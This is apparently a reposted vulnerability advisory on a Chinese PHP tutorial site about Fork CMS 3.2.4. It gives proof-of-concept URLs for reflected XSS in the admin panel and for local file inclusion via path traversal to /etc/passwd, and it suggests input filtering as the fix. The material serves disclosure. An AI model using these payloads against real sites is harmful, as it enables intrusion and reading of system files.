网站地图    收藏   

主页 > 后端 > 网站安全 >

Fork CMS v.3.2.4多重缺陷 ( LFI - XSS ) - 网站安全 -

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: Fork CMS v.3.2.4 - Multiple Vulnerabilities开发商: http://www.fork-cms.com作者: RandomStorm - http://www.randomstorm.com# Avram Marius Gabriel (d3v1l)测试平台: Windows XP ......

标题: Fork CMS v.3.2.4  - Multiple Vulnerabilities
开发商: http://www.fork-cms.com
作者: RandomStorm  - http://www.randomstorm.com
#  Avram Marius Gabriel (d3v1l)
测试平台: Windows XP & Vista
管理面板反射型跨站(XSS)
测试:
#  http://www.2cto.com /blog/settings?token=true&report=</script><script>alert(1)</script>
#  http://www.2cto.com /users/index?token=true&error=</script><script>alert(1)</script>

本地文件包含( LFI )
#  POC:
#  http://www.2cto.com /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en

#关于程序: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.
 
www.2cto.com提供修复
 
过滤相应页面

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论